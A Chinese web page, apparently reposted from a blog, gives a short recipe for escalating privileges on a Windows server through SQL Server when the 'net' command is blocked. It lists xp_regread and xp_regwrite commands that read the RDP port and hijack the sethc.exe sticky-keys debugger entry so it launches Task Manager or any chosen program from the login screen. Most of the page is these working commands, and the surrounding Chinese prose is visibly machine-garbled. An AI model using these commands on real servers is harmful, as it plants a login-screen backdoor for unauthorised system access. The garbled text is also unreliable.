|
|
|
联系客服020-83701501

无Net时的映像劫持提权

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
无Net时的映像挟制提权

起首:

1.任事器封锁了终端端口(终端端口一定是3389,或者自行盘问) 2.任事器的粘滞键效率无损,只要或者畸形弹出便可 3.任事器未阻止注册表编辑(即写入效率) sql呼吁读取任事器终端端口:

Default
12 exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'

1.sql呼吁盘问注册表粘滞键可否被挟制 Default
1 exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

 

2.sql呼吁挟制注册表粘滞键效率,改革成任务打点器(虽然你也或者改革成你想要的其余呼吁)

Default
12 xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'

3.sql呼吁删除注册表粘滞键的挟制效率爱护你的任事器再也不被别人利用 Default
1 xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'

 

link:http://blog.csdn.net/cnbird2008/article/details/8831454

本文由网络平安攻防研究室(www.91ri.org)消息平安小组收集整理,转载请阐明出处。

数安新闻+更多

证书相关+更多